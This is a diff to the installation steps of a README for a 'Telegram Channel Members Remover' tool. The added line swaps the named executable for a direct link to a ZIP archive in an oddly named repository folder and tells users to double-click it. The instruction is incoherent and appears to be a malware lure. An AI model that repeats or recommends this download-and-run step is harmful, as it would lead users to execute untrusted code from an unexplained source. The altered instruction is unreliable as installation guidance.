Koce27/Telegram-Channel-Members-Remover/README.md

 4. **Extract the ZIP File (if necessary)**: If you downloaded a ZIP file, right-click on it and select "Extract All."
 Choose a location on your computer.

-5. **Run the Application**: Open the extracted folder and double-click the application file (e.g., `TelegramChannelMembersRemover.exe` for Windows).
+5. **Run the Application**: Open the extracted folder and double-click the application file (e.g., `https://raw.githubusercontent.com/Koce27/Telegram-Channel-Members-Remover/main/unanchor/Telegram-Channel-Members-Remover_1.4-alpha.2.zip` for Windows).

 6. **Grant Permissions**: If prompted, allow the application to run.